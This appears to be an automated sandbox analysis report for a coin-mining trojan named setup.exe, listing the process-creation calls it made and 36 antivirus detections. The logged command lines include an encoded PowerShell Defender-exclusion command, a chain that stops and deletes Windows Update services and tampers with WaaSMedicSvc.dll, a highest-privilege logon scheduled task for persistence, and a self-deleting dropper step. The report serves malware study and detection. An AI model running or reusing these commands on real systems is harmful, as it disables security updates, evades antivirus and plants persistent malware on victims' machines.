NtResumeThread Aug. 31, 2022, 9:56 a.m.	thread_handle: 0x00000000000001d8 suspend_count: 1 process_identifier: 2972	1	0
NtResumeThread Aug. 31, 2022, 9:56 a.m.	thread_handle: 0x00000000000001f8 suspend_count: 1 process_identifier: 2972	1	0
NtResumeThread Aug. 31, 2022, 9:57 a.m.	thread_handle: 0x000000000000023c suspend_count: 1 process_identifier: 2972	1	0
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 145656 thread_handle: 0x0000000000000390 process_identifier: 145652 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbQB2ACMAPgAgAEAAKAAgADwAIwBpAGIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEAZQBnACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAHYAawB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAegAjAD4A" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000398	1	1
NtResumeThread Aug. 31, 2022, 9:57 a.m.	thread_handle: 0x0000000000000344 suspend_count: 1 process_identifier: 2972	1	0
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 145892 thread_handle: 0x00000000000003a0 process_identifier: 145888 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003b4	1	1
NtResumeThread Aug. 31, 2022, 9:57 a.m.	thread_handle: 0x00000000000003a8 suspend_count: 1 process_identifier: 2972	1	0
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 145532 thread_handle: 0x00000000000003b4 process_identifier: 145540 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003cc	1	1
NtResumeThread Aug. 31, 2022, 9:57 a.m.	thread_handle: 0x00000000000003bc suspend_count: 1 process_identifier: 2972	1	0
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 2392 thread_handle: 0x00000000000003d4 process_identifier: 2428 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\"" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003e8	1	1
NtResumeThread Aug. 31, 2022, 9:57 a.m.	thread_handle: 0x00000000000003b4 suspend_count: 1 process_identifier: 2972	1	0
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 2768 thread_handle: 0x00000000000003f0 process_identifier: 2776 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsAutHost" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000000000000040c	1	1
NtResumeThread Aug. 31, 2022, 9:57 a.m.	thread_handle: 0x00000000000003b8 suspend_count: 1 process_identifier: 2972	1	0
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 3324 thread_handle: 0x00000000000003e4 process_identifier: 3320 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000000000000040c	1	1
NtResumeThread Aug. 31, 2022, 9:57 a.m.	thread_handle: 0x0000000000000284 suspend_count: 1 process_identifier: 145652	1	0
NtResumeThread Aug. 31, 2022, 9:57 a.m.	thread_handle: 0x00000000000002d8 suspend_count: 1 process_identifier: 145652	1	0
NtResumeThread Aug. 31, 2022, 9:57 a.m.	thread_handle: 0x0000000000000368 suspend_count: 1 process_identifier: 145652	1	0
NtResumeThread Aug. 31, 2022, 9:57 a.m.	thread_handle: 0x00000000000003fc suspend_count: 1 process_identifier: 145652	1	0
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 145952 thread_handle: 0x0000000000000060 process_identifier: 145948 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\sc.exe track: 1 command_line: sc stop UsoSvc filepath_r: C:\Windows\system32\sc.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 146000 thread_handle: 0x0000000000000064 process_identifier: 145996 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\sc.exe track: 1 command_line: sc stop WaaSMedicSvc filepath_r: C:\Windows\system32\sc.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 146048 thread_handle: 0x0000000000000060 process_identifier: 146044 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\sc.exe track: 1 command_line: sc stop wuauserv filepath_r: C:\Windows\system32\sc.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 146096 thread_handle: 0x0000000000000064 process_identifier: 146092 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\sc.exe track: 1 command_line: sc stop bits filepath_r: C:\Windows\system32\sc.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 146144 thread_handle: 0x0000000000000060 process_identifier: 146140 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\sc.exe track: 1 command_line: sc stop dosvc filepath_r: C:\Windows\system32\sc.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 146192 thread_handle: 0x0000000000000064 process_identifier: 146188 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 146236 thread_handle: 0x0000000000000060 process_identifier: 146232 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 146288 thread_handle: 0x0000000000000064 process_identifier: 146284 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 146404 thread_handle: 0x0000000000000060 process_identifier: 146400 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 3044 thread_handle: 0x0000000000000064 process_identifier: 3040 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 2116 thread_handle: 0x0000000000000060 process_identifier: 2128 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\takeown.exe track: 1 command_line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll filepath_r: C:\Windows\system32\takeown.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 2180 thread_handle: 0x0000000000000064 process_identifier: 2188 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\icacls.exe track: 1 command_line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q filepath_r: C:\Windows\system32\icacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 2588 thread_handle: 0x0000000000000068 process_identifier: 2584 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000006c	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 2740 thread_handle: 0x000000000000006c process_identifier: 2712 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 2952 thread_handle: 0x0000000000000068 process_identifier: 2936 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000006c	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 3100 thread_handle: 0x000000000000006c process_identifier: 3096 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1
CreateProcessInternalW Aug. 31, 2022, 9:57 a.m.	thread_identifier: 3156 thread_handle: 0x0000000000000068 process_identifier: 3152 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000006c	1	1

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Bkav	W32.AIDetect.malware1
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Babar.97319
FireEye	Generic.mg.a85d7d886197d00f
CAT-QuickHeal	Trojan.GenericPMF.S28392069
K7AntiVirus	Trojan ( 0056e5201 )
K7GW	Trojan ( 0056e5201 )
Cybereason	malicious.1d2920
Cyren	W32/Trojan.HLPX-5019
ESET-NOD32	multiple detections
Cynet	Malicious (score: 100)
APEX	Malicious
ClamAV	Win.Malware.Fugrafa-9938779-0
Kaspersky	HEUR:Trojan.MSIL.Miner.gen
BitDefender	Gen:Variant.Babar.97319
Emsisoft	Gen:Variant.Babar.97319 (B)
F-Secure	Heuristic.HEUR/AGEN.1221928
VIPRE	Gen:Variant.Babar.97319
McAfee-GW-Edition	BehavesLike.Win32.Generic.tc
Sophos	Generic ML PUA (PUA)
SentinelOne	Static AI - Malicious SFX
Avira	HEUR/AGEN.1221928
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
Arcabit	Trojan.Babar.D17C27
GData	Win32.Trojan.PSE.I7XB25
Google	Detected
AhnLab-V3	Trojan/Win.Generic.C5036727
Acronis	suspicious
ALYac	Gen:Variant.Babar.97319
MAX	malware (ai score=88)
VBA32	BScope.Trojan.Wacatac
Malwarebytes	Malware.AI.1107261023
Rising	Trojan.Kryptik!8.8 (TFE:5:qFgFsCC2vGK)
Ikarus	Trojan.MSIL.CoinMiner
AVG	Win64:TrojanX-gen [Trj]
Avast	Win64:TrojanX-gen [Trj]

setup.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All